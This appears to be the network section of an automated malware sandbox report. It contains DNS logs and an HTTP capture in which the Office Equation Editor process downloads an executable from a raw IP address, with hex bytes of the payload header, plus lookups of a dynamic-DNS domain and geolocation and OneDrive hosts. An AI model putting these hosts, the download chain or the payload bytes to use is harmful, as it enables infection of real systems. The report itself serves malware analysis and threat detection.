                                                                                                                                                                                  Apr 24, 2024 07:42:17.888453007 CEST192.168.2.228.8.8.80xed20Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.256521940 CEST192.168.2.228.8.8.80x5352Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.530210018 CEST192.168.2.228.8.8.80x7a67Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.706381083 CEST192.168.2.228.8.8.80x19d9Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:32.674868107 CEST192.168.2.228.8.8.80x148eStandard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:33.252065897 CEST192.168.2.228.8.8.80xf078Standard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.826627016 CEST192.168.2.228.8.8.80x74c9Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.332588911 CEST192.168.2.228.8.8.80xafe2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.521725893 CEST192.168.2.228.8.8.80x7e6bStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.227965117 CEST192.168.2.228.8.8.80x5eaeStandard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.576282024 CEST192.168.2.228.8.8.80x4a95Standard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.015702963 CEST192.168.2.228.8.8.80x591cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.213288069 CEST192.168.2.228.8.8.80x52a6Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.387130976 CEST192.168.2.228.8.8.80x5e23Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.156589985 CEST192.168.2.228.8.8.80xab57Standard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.339688063 CEST192.168.2.228.8.8.80x51e6Standard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Apr 24, 2024 07:42:01.157705069 CEST8.8.8.8192.168.2.220xbe59No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.157705069 CEST8.8.8.8192.168.2.220xbe59No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.157705069 CEST8.8.8.8192.168.2.220xbe59No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.157705069 CEST8.8.8.8192.168.2.220xbe59No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.157705069 CEST8.8.8.8192.168.2.220xbe59No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.369122982 CEST8.8.8.8192.168.2.220xd1d7No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.369122982 CEST8.8.8.8192.168.2.220xd1d7No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.369122982 CEST8.8.8.8192.168.2.220xd1d7No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.369122982 CEST8.8.8.8192.168.2.220xd1d7No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.369122982 CEST8.8.8.8192.168.2.220xd1d7No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.550178051 CEST8.8.8.8192.168.2.220x3c3aNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.550178051 CEST8.8.8.8192.168.2.220x3c3aNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.550178051 CEST8.8.8.8192.168.2.220x3c3aNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.550178051 CEST8.8.8.8192.168.2.220x3c3aNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.550178051 CEST8.8.8.8192.168.2.220x3c3aNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:03.469533920 CEST8.8.8.8192.168.2.220x4664No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:03.469533920 CEST8.8.8.8192.168.2.220x4664No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:03.658124924 CEST8.8.8.8192.168.2.220x9288No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:03.658124924 CEST8.8.8.8192.168.2.220x9288No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.318949938 CEST8.8.8.8192.168.2.220xfb58No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.318949938 CEST8.8.8.8192.168.2.220xfb58No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.318949938 CEST8.8.8.8192.168.2.220xfb58No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.318949938 CEST8.8.8.8192.168.2.220xfb58No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.318949938 CEST8.8.8.8192.168.2.220xfb58No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.541857004 CEST8.8.8.8192.168.2.220xfbdbNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.541857004 CEST8.8.8.8192.168.2.220xfbdbNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.541857004 CEST8.8.8.8192.168.2.220xfbdbNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.541857004 CEST8.8.8.8192.168.2.220xfbdbNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.541857004 CEST8.8.8.8192.168.2.220xfbdbNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:10.405318022 CEST8.8.8.8192.168.2.220x9fbcNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:10.405318022 CEST8.8.8.8192.168.2.220x9fbcNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:10.405318022 CEST8.8.8.8192.168.2.220x9fbcNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:10.405318022 CEST8.8.8.8192.168.2.220x9fbcNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:10.405318022 CEST8.8.8.8192.168.2.220x9fbcNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:12.840568066 CEST8.8.8.8192.168.2.220x677eNo error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:12.840568066 CEST8.8.8.8192.168.2.220x677eNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:13.049186945 CEST8.8.8.8192.168.2.220xfbb2No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:13.049186945 CEST8.8.8.8192.168.2.220xfbb2No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:15.511465073 CEST8.8.8.8192.168.2.220x5f87No error (0)kenoss.duckdns.org103.186.117.100A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:17.544903994 CEST8.8.8.8192.168.2.220xed20No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:17.717619896 CEST8.8.8.8192.168.2.220xed20No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:17.888144970 CEST8.8.8.8192.168.2.220xed20No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:18.058909893 CEST8.8.8.8192.168.2.220xed20No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.427285910 CEST8.8.8.8192.168.2.220x5352No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.427285910 CEST8.8.8.8192.168.2.220x5352No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.427285910 CEST8.8.8.8192.168.2.220x5352No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.427285910 CEST8.8.8.8192.168.2.220x5352No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.427285910 CEST8.8.8.8192.168.2.220x5352No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.700205088 CEST8.8.8.8192.168.2.220x7a67No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.700205088 CEST8.8.8.8192.168.2.220x7a67No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.700205088 CEST8.8.8.8192.168.2.220x7a67No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.700205088 CEST8.8.8.8192.168.2.220x7a67No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.700205088 CEST8.8.8.8192.168.2.220x7a67No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:30.876983881 CEST8.8.8.8192.168.2.220x19d9No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:32.844805002 CEST8.8.8.8192.168.2.220x148eNo error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:32.844805002 CEST8.8.8.8192.168.2.220x148eNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:33.447045088 CEST8.8.8.8192.168.2.220xf078No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:33.447045088 CEST8.8.8.8192.168.2.220xf078No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:39.996619940 CEST8.8.8.8192.168.2.220x74c9No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.502870083 CEST8.8.8.8192.168.2.220xafe2No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:40.691591024 CEST8.8.8.8192.168.2.220x7e6bNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.573425055 CEST8.8.8.8192.168.2.220x5eaeNo error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.573425055 CEST8.8.8.8192.168.2.220x5eaeNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.746292114 CEST8.8.8.8192.168.2.220x4a95No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:42.746292114 CEST8.8.8.8192.168.2.220x4a95No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.187052011 CEST8.8.8.8192.168.2.220x591cNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.383583069 CEST8.8.8.8192.168.2.220x52a6No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:00.557641983 CEST8.8.8.8192.168.2.220x5e23No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.337326050 CEST8.8.8.8192.168.2.220xab57No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.337326050 CEST8.8.8.8192.168.2.220xab57No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.510268927 CEST8.8.8.8192.168.2.220x51e6No error (0)oqgpra.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:43:02.510268927 CEST8.8.8.8192.168.2.220x51e6No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • onedrive.live.com
                                                                                                                                                                                  • 103.198.26.173
                                                                                                                                                                                  • geoplugin.net

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.2249163103.198.26.173803264C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Apr 24, 2024 07:41:54.083610058 CEST312OUTGET /360/HJC.exe HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: 103.198.26.173
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Apr 24, 2024 07:41:54.512376070 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Wed, 24 Apr 2024 06:41:52 GMT
                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                  Last-Modified: Mon, 22 Apr 2024 08:30:20 GMT
                                                                                                                                                                                  ETag: "190400-616ab3f81c82f"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 1639424
                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                  Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 68 05 00 00 98 13 00 00 00 00 00 c0 75 05 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 19 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 10 17 00 78 00 00 00 00 e0 16 00 66 20 00 00 00 b0 17 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 17 00 28 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 08 66 05 00 00 10 00 00 00 68 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 47 11 00 00 80 05 00 00 48 11 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 5d 0d 00 00 00 d0 16 00 00 00 00 00 00 b4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 66 20 00 00 00 e0 16 00 00 22 00 00 00 b4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 78 00 00 00 00 10 17 00 00 02 00 00 00 d6 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 74 6c 73 00 00 00 00 10 00 00 00 00 20 17 00 00 00 00 00 00 d8 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 30 17 00 00 02 00 00 00 d8 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 28 63 00 00 00 40 17 00 00 64 00 00 00 da 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 c6 01 00 00 b0 17 00 00 c6 01 00 00 3e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 80 19 00 00 00 00 00 00 04 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
